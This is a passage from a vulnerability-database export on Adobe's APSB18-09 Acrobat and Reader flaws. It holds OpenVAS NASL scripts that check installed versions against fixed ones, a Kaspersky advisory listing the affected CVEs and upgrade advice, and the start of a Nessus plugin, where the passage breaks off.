version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813238\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - 
Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], 
"description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813232", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813232\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and is prone to multiple 
vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-07-17T14:18:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813233", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813233\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader 2017\n and is prone to 
multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], 
"kaspersky": [{"lastseen": "2020-09-02T11:54:57", "bulletinFamily": "info", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "### *Detect date*:\n05/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Acrobat and Acrobat Reader. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information and bypass security restrictions. 
Below is a complete list of vulnerabilities:\n\n### *Affected products*:\nAdobe Acrobat DC earlier than 2018.011.20040 \nAdobe Acrobat Reader DC earlier than 2018.011.20040 \nAdobe Acrobat 2017 earlier than 2017.011.30080 \nAdobe Acrobat Reader 2017 earlier than 2017.011.30080 \nAdobe Acrobat DC (Classic 2015) earlier than 2015.006.30418 \nAdobe Acrobat Reader DC (Classic 2015) earlier than 2015.006.30418\n\n### *Solution*:\nUpgrade to latest version \n[Download Adobe Acrobat DC](<http://supportdownloads.adobe.com/product.jsp?product=1&platform=Windows>) \n[Download Adobe Acrobat Reader DC](<https://get.adobe.com/ru/reader/>)\n\n### *Original advisories*:\n[APSB18-09](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Acrobat](<https://threats.kaspersky.com/en/product/Adobe-Acrobat/>)\n\n### *CVE-IDS*:\n[CVE-2018-4990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4990>)0.0Unknown \n[CVE-2018-4947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4947>)0.0Unknown \n[CVE-2018-4948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4948>)0.0Unknown \n[CVE-2018-4966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4966>)0.0Unknown \n[CVE-2018-4968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4968>)0.0Unknown \n[CVE-2018-4978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4978>)0.0Unknown \n[CVE-2018-4982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4982>)0.0Unknown \n[CVE-2018-4984](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4984>)0.0Unknown \n[CVE-2018-4996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4996>)0.0Unknown \n[CVE-2018-4952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4952>)0.0Unknown \n[CVE-2018-4954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4954>)0.0Unknown \n[CVE-2018-4958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4958>)0.0Unknown 
\n[CVE-2018-4959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4959>)0.0Unknown \n[CVE-2018-4961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4961>)0.0Unknown \n[CVE-2018-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4971>)0.0Unknown \n[CVE-2018-4974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4974>)0.0Unknown \n[CVE-2018-4977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4977>)0.0Unknown \n[CVE-2018-4980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4980>)0.0Unknown \n[CVE-2018-4983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4983>)0.0Unknown \n[CVE-2018-4988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4988>)0.0Unknown \n[CVE-2018-4989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4989>)0.0Unknown \n[CVE-2018-4950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4950>)0.0Unknown \n[CVE-2018-4979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4979>)0.0Unknown \n[CVE-2018-4949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949>)0.0Unknown \n[CVE-2018-4951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4951>)0.0Unknown \n[CVE-2018-4955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4955>)0.0Unknown \n[CVE-2018-4956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4956>)0.0Unknown \n[CVE-2018-4957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4957>)0.0Unknown \n[CVE-2018-4960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4960>)0.0Unknown \n[CVE-2018-4962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4962>)0.0Unknown \n[CVE-2018-4963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4963>)0.0Unknown \n[CVE-2018-4964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4964>)0.0Unknown \n[CVE-2018-4967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4967>)0.0Unknown 
\n[CVE-2018-4969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4969>)0.0Unknown \n[CVE-2018-4970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4970>)0.0Unknown \n[CVE-2018-4972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4972>)0.0Unknown \n[CVE-2018-4973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4973>)0.0Unknown \n[CVE-2018-4975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4975>)0.0Unknown \n[CVE-2018-4976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4976>)0.0Unknown \n[CVE-2018-4981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4981>)0.0Unknown \n[CVE-2018-4986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4986>)0.0Unknown \n[CVE-2018-4985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4985>)0.0Unknown \n[CVE-2018-4953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4953>)0.0Unknown \n[CVE-2018-4987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4987>)0.0Unknown \n[CVE-2018-4965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4965>)0.0Unknown \n[CVE-2018-4993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4993>)0.0Unknown \n[CVE-2018-4995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4995>)0.0Unknown \n[CVE-2018-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12812>)0.0Unknown \n[CVE-2018-12815](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12815>)0.0Unknown\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2018-05-14T00:00:00", "id": "KLA11252", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11252", "title": "\r KLA11252Multiple vulnerabilities in Adobe Acrobat and Acrobat Reader ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T01:17:11", "description": "The version of Adobe Reader installed on the remote Windows host is a\nversion prior or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": 
["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109896);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the 
